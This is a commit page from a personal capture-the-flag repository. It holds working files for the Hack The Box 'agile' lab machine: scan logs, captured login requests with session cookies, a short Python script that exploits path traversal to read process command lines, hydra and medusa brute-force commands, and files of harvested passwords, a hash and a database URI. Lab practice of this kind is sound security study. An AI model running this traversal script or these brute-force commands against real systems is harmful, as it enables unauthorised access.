simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

init htb

Browse Source 
old htb folders
This commit is contained in:
Simon
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
HTB/agile/.idea/.gitignore generated vendored Normal file
View File

@@ -0,0 +1,3 @@
# Default ignored files
/shelf/
/workspace.xml

8
HTB/agile/.idea/agile.iml generated Normal file
View File

@@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$" />
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
</module>

6
HTB/agile/.idea/inspectionProfiles/profiles_settings.xml generated Normal file
View File

@@ -0,0 +1,6 @@
<component name="InspectionProjectProfileManager">
<settings>
<option name="USE_PROJECT_PROFILE" value="false" />
<version value="1.0" />
</settings>
</component>

4
HTB/agile/.idea/misc.xml generated Normal file
View File

@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.11" project-jdk-type="Python SDK" />
</project>

8
HTB/agile/.idea/modules.xml generated Normal file
View File

@@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/agile.iml" filepath="$PROJECT_DIR$/.idea/agile.iml" />
</modules>
</component>
</project>

6
HTB/agile/.idea/vcs.xml generated Normal file
View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="$PROJECT_DIR$/.." vcs="Git" />
</component>
</project>

16
HTB/agile/add.req Normal file
View File

@@ -0,0 +1,16 @@
POST /vault/add_row HTTP/1.1
Host: superpass.htb
Content-Length: 65
HX-Request: true
HX-Current-URL: http://superpass.htb/vault
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://superpass.htb
Referer: http://superpass.htb/vault
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: remember_token=10|a91ce8f326a4f9f0a8529318e8bb45fb40d8b5747b727b7815fddf9f7d74fd4414370eed6fdcd69074041975f71e52a5cbe305cfc06715ace1b48a7238f3841e; session=.eJwlzjsOwjAMANC7ZGaIv3F6mcpOHMHa0glxdyqxv-F9yr6OPJ9lex9XPsr-mmUr3U15ZCzOgAbNdXlHxIAwj_RKhOws5hh9yErtIUlggnUxhmIzZxUnUfNO7rlCm944hGetaCg4V-AgiulQUzoxjaQAMil35Drz-G-glu8PDtIvfQ.ZASIuQ.XJSs2qTqPUyY844ASr0GkR1AIgM
Connection: close
url=app.hackthebox.com&username=ich&password=a046e3f056bbc089097d

5
HTB/agile/ape.py Normal file
View File

@@ -0,0 +1,5 @@
import requests
for i in range(99999):
r = requests.get(f"http://superpass.htb/download?fn=../proc/{i}/cmdline", headers={'Cookie':'remember_token=9|8f50cc62e035672203937ef350c45d6a6780afafd9114b725dfb34ffa10cd42e92e484635b44b3f13d76ce1f6af818f2501684844daf93217e66ec4af933165f; session=.eJwtzjkSwjAMAMC_qKawdVnOZzKSLQ-0CakY_k4K-i32A_s68nzC9j6ufMD-mrBBd1MeGYszaqvNdXlHxKhhHumFCNlZzDH6kJXaQ5KqCZbFGIrNnFWcRM07uecKbXrjEJ6loKHgXIGDKKbXktKJaSRFJRO4I9eZx38D3x_fnS9V.ZATj_Q.KVBnfkocj-Ie2uO_zF_EjpCb53o'})
if r.text and "FileNotFoundError" not in r.text: print(i, r.text)

3
HTB/agile/creds.txt Normal file
View File

@@ -0,0 +1,3 @@
corum:5db7caa1d13cc37c9fc2
edwards:d07867c6267dcb5df0af
edwards:1d7ffjwrx#$d6qn!9nndqgde4

1
HTB/agile/ferox-http_agile_htb:80_-1678019995.state Normal file
View File

@@ -0,0 +1 @@
{"scans":[{"id":"4f365a5c329a4e3d9c5219eeec5c69b9","url":"http://agile.htb:80/","normalized_url":"http://agile.htb:80/","scan_type":"Directory","status":"Running","num_requests":833000}],"config":{"type":"configuration","wordlist":"/root/.local/share/AutoRecon/wordlists/dirbuster.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://agile.htb:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":10,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":true,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://agile.htb/","original_url":"http://agile.htb:80/","path":"/","wildcard":false,"status":200,"method":"GET","content_length":612,"line_count":25,"word_count":69,"headers":{"connection":"keep-alive","date":"Sun, 05 Mar 2023 11:57:58 GMT","content-length":"612","last-modified":"Thu, 01 Dec 2022 18:20:40 GMT","content-type":"text/html","server":"nginx/1.18.0 (Ubuntu)","accept-ranges":"bytes","etag":"\"6388f078-264\""},"extension":""}],"statistics":{"type":"statistics","timeouts":0,"requests":193535,"expected_per_scan":833000,"total_expected":833000,"errors":0,"successes":3,"redirects":0,"client_errors":193532,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":3,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":1,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]}

1
HTB/agile/hashes Normal file
View File

@@ -0,0 +1 @@
$6$rounds=200000$tXCy.rfqmsaJqOoA$Pu1DcBDRZt4a6OGO35cdU4fd7mlhPthDpMcQBOclCuhW1hnAIk1aj/itcJIQ8lIhRHxSZNe4I.5aqaTtkWtnr0

15
HTB/agile/login.req Normal file
View File

@@ -0,0 +1,15 @@
POST /account/login HTTP/1.1
Host: superpass.htb
Content-Length: 35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://superpass.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://superpass.htb/account/login
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
username=user&password=pass&submit=

6
HTB/agile/notes Normal file
View File

@@ -0,0 +1,6 @@
GNU nano 6.2 /var/tmp/config_testXX95KiYD.json
{
"SQL_URI": "mysql+pymysql://superpasstester:VUO8A2c2#3FnLq3*a9DX1U@localhost/superpasstest"
}

9
HTB/agile/passes Normal file
View File

@@ -0,0 +1,9 @@
47ed1e73c955de230a1d
9799588839ed0f98c211
5db7caa1d13cc37c9fc2
762b430d32eea2f12970
5b133f7a6a1c180646cb
d07867c6267dcb5df0af
7dbfe676b6b564ce5718
VUO8A2c2#3FnLq3*a9DX1U
1d7ffjwrx#$d6qn!9nndqgde4

15
HTB/agile/register.req Normal file
View File

@@ -0,0 +1,15 @@
POST /account/register HTTP/1.1
Host: superpass.htb
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://superpass.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://superpass.htb/account/register
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
username=name&password=pass

0
HTB/agile/results/agile.htb/report/local.txt Normal file
View File

8
HTB/agile/results/agile.htb/report/notes.txt Normal file
View File

@@ -0,0 +1,8 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.

0
HTB/agile/results/agile.htb/report/proof.txt Normal file
View File

26
HTB/agile/results/agile.htb/scans/_commands.log Normal file
View File

@@ -0,0 +1,26 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/htb/agile/results/agile.htb/scans/_quick_tcp_nmap.txt" -oX "/home/simon/htb/agile/results/agile.htb/scans/xml/_quick_tcp_nmap.xml" agile.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/htb/agile/results/agile.htb/scans/_full_tcp_nmap.txt" -oX "/home/simon/htb/agile/results/agile.htb/scans/xml/_full_tcp_nmap.xml" agile.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/htb/agile/results/agile.htb/scans/_top_100_udp_nmap.txt" -oX "/home/simon/htb/agile/results/agile.htb/scans/xml/_top_100_udp_nmap.xml" agile.htb
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/simon/htb/agile/results/agile.htb/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/simon/htb/agile/results/agile.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml" agile.htb
feroxbuster -u http://agile.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://agile.htb:80/.well-known/security.txt
curl -sSikf http://agile.htb:80/robots.txt
curl -sSik http://agile.htb:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/htb/agile/results/agile.htb/scans/tcp80/xml/tcp_80_http_nmap.xml" agile.htb
curl -sk -o /dev/null -H "Host: CjtbPfJYAxsXMwHqOChN.agile.htb" http://agile.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://agile.htb:80 2>&1
wkhtmltoimage --format png http://agile.htb:80/ /home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://agile.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.agile.htb" -fs 178 -noninteractive -s | tee "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_agile.htb_vhosts_subdomains-top1million-110000.txt"

61
HTB/agile/results/agile.htb/scans/_full_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,61 @@
# Nmap 7.93 scan initiated Sun Mar 5 12:57:19 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/htb/agile/results/agile.htb/scans/_full_tcp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_full_tcp_nmap.xml agile.htb
adjust_timeouts2: packet supposedly had rtt of -114342 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -114342 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -154821 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -154821 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -122159 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -122159 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -194858 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -194858 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -130249 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -130249 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -168441 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -168441 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -256470 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -256470 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1204339 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1204339 microseconds. Ignoring time.
Nmap scan report for agile.htb (10.129.29.4)
Host is up, received user-set (0.11s latency).
Scanned at 2023-03-05 12:57:20 CET for 488s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=
| 256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to nginx!
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/5%OT=22%CT=1%CU=39945%PV=Y%DS=2%DC=T%G=Y%TM=64048588
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)SEQ(SP=10
OS:5%GCD=2%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3
OS:=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 26.290 days (since Tue Feb 7 06:07:42 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 111.48 ms 10.10.16.1
2 111.57 ms agile.htb (10.129.29.4)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 5 13:05:28 2023 -- 1 IP address (1 host up) scanned in 490.31 seconds

32
HTB/agile/results/agile.htb/scans/_manual_commands.txt Normal file
View File

@@ -0,0 +1,32 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/simon/htb/agile/results/agile.htb/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://agile.htb
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/simon/htb/agile/results/agile.htb/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h agile.htb
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://agile.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://agile.htb/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h agile.htb -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://agile.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h agile.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://agile.htb:80 2>&1 | tee "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://agile.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_wpscan.txt"

8
HTB/agile/results/agile.htb/scans/_patterns.log Normal file
View File

@@ -0,0 +1,8 @@
Nmap script found a potential vulnerability. (State: VULNERABLE)
CVE Identified: CVE-2011-3192
CVE Identified: CVE-2011-3192
Identified HTTP Server: nginx/1.18.0 (Ubuntu)

64
HTB/agile/results/agile.htb/scans/_quick_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,64 @@
# Nmap 7.93 scan initiated Sun Mar 5 12:57:19 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/htb/agile/results/agile.htb/scans/_quick_tcp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_quick_tcp_nmap.xml agile.htb
adjust_timeouts2: packet supposedly had rtt of -302421 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -302421 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -582104 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -582104 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -882856 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -882856 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -907948 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -907948 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1569314 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1569314 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1429712 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1429712 microseconds. Ignoring time.
Nmap scan report for agile.htb (10.129.29.4)
Host is up, received user-set (0.18s latency).
Scanned at 2023-03-05 12:57:20 CET for 34s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=
| 256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to nginx!
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
OS fingerprint not ideal because: maxTimingRatio (1.490000e+00) is greater than 1.4
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=3/5%OT=22%CT=1%CU=42905%PV=Y%DS=2%DC=T%G=N%TM=640483C2%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)
SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%TS=A)
OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
U1(R=N)
IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 26.285 days (since Tue Feb 7 06:07:42 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 199.29 ms 10.10.16.1
2 199.53 ms agile.htb (10.129.29.4)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 5 12:57:55 2023 -- 1 IP address (1 host up) scanned in 36.44 seconds

40
HTB/agile/results/agile.htb/scans/_top_100_udp_nmap.txt Normal file
View File

@@ -0,0 +1,40 @@
# Nmap 7.93 scan initiated Sun Mar 5 12:57:19 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/htb/agile/results/agile.htb/scans/_top_100_udp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_top_100_udp_nmap.xml agile.htb
Warning: 10.129.29.4 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.129.29.4 from 100 to 200 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.129.29.4 from 200 to 400 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.29.4 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for agile.htb (10.129.29.4)
Host is up, received user-set (0.11s latency).
Scanned at 2023-03-05 12:57:20 CET for 224s
Not shown: 90 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
68/udp open|filtered dhcpc no-response
111/udp open|filtered rpcbind no-response
177/udp open|filtered xdmcp no-response
514/udp open|filtered syslog no-response
1026/udp open|filtered win-rpc no-response
1718/udp open|filtered h225gatedisc no-response
1812/udp open|filtered radius no-response
2223/udp open|filtered rockwell-csp2 no-response
5000/udp open|filtered upnp no-response
5632/udp open|filtered pcanywherestat no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=3/5%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=64048480%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 33281/udp)
HOP RTT ADDRESS
1 86.38 ms 10.10.16.1
2 86.81 ms agile.htb (10.129.29.4)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 5 13:01:04 2023 -- 1 IP address (1 host up) scanned in 225.98 seconds

60
HTB/agile/results/agile.htb/scans/tcp22/tcp_22_ssh_nmap.txt Normal file
View File

@@ -0,0 +1,60 @@
# Nmap 7.93 scan initiated Sun Mar 5 12:57:55 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/simon/htb/agile/results/agile.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml agile.htb
Nmap scan report for agile.htb (10.129.29.4)
Host is up, received user-set (0.24s latency).
Scanned at 2023-03-05 12:57:56 CET for 4s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=
| 256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
